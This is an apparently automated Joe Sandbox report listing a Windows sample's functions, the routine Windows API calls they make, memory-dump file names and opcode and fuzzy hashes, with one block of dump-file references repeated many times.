                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldiv__aullrem
                                                                                                                                                  • String ID: ps@
                                                                                                                                                  • API String ID: 3839614884-3648969447
                                                                                                                                                  • Opcode ID: 0442da05a44c33f379b904c3c4e5c42a4996a2f79cfbd727fa3a53352f19f04d
                                                                                                                                                  • Instruction ID: 46bb8d81eff826039a297473cdee4f29e73d028a3c6ebbea8b1d18ef4ce3e168
                                                                                                                                                  • Opcode Fuzzy Hash: 0442da05a44c33f379b904c3c4e5c42a4996a2f79cfbd727fa3a53352f19f04d
                                                                                                                                                  • Instruction Fuzzy Hash: 6001A736A00308FBDB10DF85C881BEEB7B8FF55758F20006AE941AB291D3745E55C7A5
                                                                                                                                                  Function 0040AFC2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(Advapi32.dll,00000000,?,004033D2,?,?,00000000,00000001,00000000), ref: 0040AFCB
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,004033D2,?,?,00000000,00000001,00000000), ref: 0040AFE7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$FreeLoad
                                                                                                                                                  • String ID: Advapi32.dll
                                                                                                                                                  • API String ID: 534179979-3915320344
                                                                                                                                                  • Opcode ID: 4278834ec9cce2ffc35f50f93191967f2b486e3139bc921edc30ada9059e455d
                                                                                                                                                  • Instruction ID: 20873ef2e13710d6682d9995c15ba680629ab6c15623019065aed41590c97be6
                                                                                                                                                  • Opcode Fuzzy Hash: 4278834ec9cce2ffc35f50f93191967f2b486e3139bc921edc30ada9059e455d
                                                                                                                                                  • Instruction Fuzzy Hash: 3BD0A7616C27725F45122E2428158EE13096D937623101923F88163342971D0DBEA3EF
                                                                                                                                                  Function 0045B750 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00467D40: WaitForSingleObject.KERNEL32(00000004,000000FF,00414EAE,?,?,?,?,?,-00000015,?,00000001), ref: 00467D43
                                                                                                                                                    • Part of subcall function 00467D90: SetEvent.KERNEL32(00000000,00410875), ref: 00467D93
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0045B7AF
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0045B7BC
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0045B7F4
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0045B7F7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave$EventObjectSingleWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 497781136-0
                                                                                                                                                  • Opcode ID: f00641594f67dfe51fd12f5960b387a82b6f6c16f84c067c4e8ce7b92c2627a7
                                                                                                                                                  • Instruction ID: 3af2ea7900bef51d545bc08368118ad27f0d95d864bb49813a416335c3c57d34
                                                                                                                                                  • Opcode Fuzzy Hash: f00641594f67dfe51fd12f5960b387a82b6f6c16f84c067c4e8ce7b92c2627a7
                                                                                                                                                  • Instruction Fuzzy Hash: B14171316007059BC718EF75C880AAAB3E5FF88315F00462EE86A87756DB38B919CBD5
                                                                                                                                                  Function 004636D0 Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0046371E
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00463732
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0046373E
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0046374E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                  • Opcode ID: be6f2f0e771557874f59cf4a697b6ecf98a20e479a6ff9401fa4c6aab200aca5
                                                                                                                                                  • Instruction ID: 3e3ca3dc5248aac95ec3b9a41c1ed57d8f5a30841b2515989fd127147094b4db
                                                                                                                                                  • Opcode Fuzzy Hash: be6f2f0e771557874f59cf4a697b6ecf98a20e479a6ff9401fa4c6aab200aca5
                                                                                                                                                  • Instruction Fuzzy Hash: 96117276500345DFC760DF24D48455AB7E8EFD436AF10482FE556C3201E774E988CB66
                                                                                                                                                  Function 0046ECE8 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,0046EAB0,00000000,00000000,00000000,0046C481,00000000,00000000,?,00000000,00000000,00000000), ref: 0046ED10
                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,0046EAB0,00000000,00000000,00000000,0046C481,00000000,00000000,?,00000000,00000000,00000000), ref: 0046ED44
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0046ED5E
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 0046ED75
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocHeap$FreeVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3499195154-0
                                                                                                                                                  • Opcode ID: 3bcb4379f52178a2747e8c7a2a0435444e081fa75036be3dcb41addd3b27817c
                                                                                                                                                  • Instruction ID: e99ee0c0c25addd6949028a1568b09d869036b3ae7477acd9cb2c513bb4242ad
                                                                                                                                                  • Opcode Fuzzy Hash: 3bcb4379f52178a2747e8c7a2a0435444e081fa75036be3dcb41addd3b27817c
                                                                                                                                                  • Instruction Fuzzy Hash: 4F119E30200202EFEB30AF29ED459267BF6FBA5314B910A7BF15AC21F0D370A851CB09
                                                                                                                                                  Function 0046E0C1 Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0046DEA2,?,0046D3C4), ref: 0046E0CE
                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0046DEA2,?,0046D3C4), ref: 0046E0D6
                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0046DEA2,?,0046D3C4), ref: 0046E0DE
                                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,0046DEA2,?,0046D3C4), ref: 0046E0E6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 32694325-0
                                                                                                                                                  • Opcode ID: be83a6b61fd98b018acef9b2484046da8e9ac7c116fc1bf3366f94f776920b83
                                                                                                                                                  • Instruction ID: fdf1311b17fd7e53380e55c283ee5eac752405fd5b139eb65c3a85b7a9ff6beb
                                                                                                                                                  • Opcode Fuzzy Hash: be83a6b61fd98b018acef9b2484046da8e9ac7c116fc1bf3366f94f776920b83
                                                                                                                                                  • Instruction Fuzzy Hash: 2BC00231C021349FCF513B59FD0484E3FB5EB442A07158477A104511B08A211C62DFD8

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 04084D88 Relevance: .9, Instructions: 859COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.2252673174.0000000004080000.00000040.00000800.00020000.00000000.sdmp, Offset: 04080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_4080000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 94143ccc321bfb375d16a4fced104225825e16023dbdb8eaafe8ca997c04471a
                                                                                                                                                  • Instruction ID: fe7cc938bcab91403a13556edceefa07028a032063e51023f0bfb1030bd4e430
                                                                                                                                                  • Opcode Fuzzy Hash: 94143ccc321bfb375d16a4fced104225825e16023dbdb8eaafe8ca997c04471a
                                                                                                                                                  • Instruction Fuzzy Hash: 67724C74A00209EFCB05DFA8DA84AADBBF2FF49314F248559E845AB365D731ED41CB90
                                                                                                                                                  Function 04085E10 Relevance: .6, Instructions: 620COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.2252673174.0000000004080000.00000040.00000800.00020000.00000000.sdmp, Offset: 04080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_4080000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c39a0c91946fc3f52c05f0444643349cf4a843f410f69583e6c81878cab48c0a
                                                                                                                                                  • Instruction ID: 4c6e2e1d290f57e3e9970bf521c361096769309b3a3b429081466a111e034cd4
                                                                                                                                                  • Opcode Fuzzy Hash: c39a0c91946fc3f52c05f0444643349cf4a843f410f69583e6c81878cab48c0a
                                                                                                                                                  • Instruction Fuzzy Hash: EA423A74A002199FCB05DF98D984AAEFBF1FF49310F258559E845AB366C732ED81CB90
                                                                                                                                                  Function 04082F48 Relevance: .5, Instructions: 483COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.2252673174.0000000004080000.00000040.00000800.00020000.00000000.sdmp, Offset: 04080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_4080000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9fe1459af8bb16cffab9502482d1854dc0846408fff26bf95cc7f8871a75b813
                                                                                                                                                  • Instruction ID: dfcb60c50540dc14f5b0f46e585b1f3ab70f5c6553ae6cd0830f78456d1ec417
                                                                                                                                                  • Opcode Fuzzy Hash: 9fe1459af8bb16cffab9502482d1854dc0846408fff26bf95cc7f8871a75b813
                                                                                                                                                  • Instruction Fuzzy Hash: A6124D74A002099FCB05DF98C594AAEFBF2FF89310F248559E845AB365C736ED85CB90
                                                                                                                                                  Function 0055D005 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.2247937297.000000000055D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0055D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_55d000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 615574aa9a3f9107cab0a42719788e5e084ae17838dc5e404e825dedb48954af
                                                                                                                                                  • Instruction ID: 6292c89432dfd7f4ab1dd031606deaed0d5c20c1b7c51bb7870e576e7baac593
                                                                                                                                                  • Opcode Fuzzy Hash: 615574aa9a3f9107cab0a42719788e5e084ae17838dc5e404e825dedb48954af
                                                                                                                                                  • Instruction Fuzzy Hash: 47016D6200D3C09FD7228B258C98652BFB8EF53221F0984DBEC888F2A3D2695C49C771
                                                                                                                                                  Function 0055D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.2247937297.000000000055D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0055D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_55d000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2733813e1986c3cb8cdac4dc28b61e16fbc2ebb36d85b3c3cc5dca370c0c1045
                                                                                                                                                  • Instruction ID: 8899bb26b9aecefbf3f94274fedea269c6a11d4b377ccc4c20b9507dbeb738a2
                                                                                                                                                  • Opcode Fuzzy Hash: 2733813e1986c3cb8cdac4dc28b61e16fbc2ebb36d85b3c3cc5dca370c0c1045
                                                                                                                                                  • Instruction Fuzzy Hash: 25012B320053409ED7308A16CD88B67BFACFF45321F18C82BED480B2D6D279984ACAB1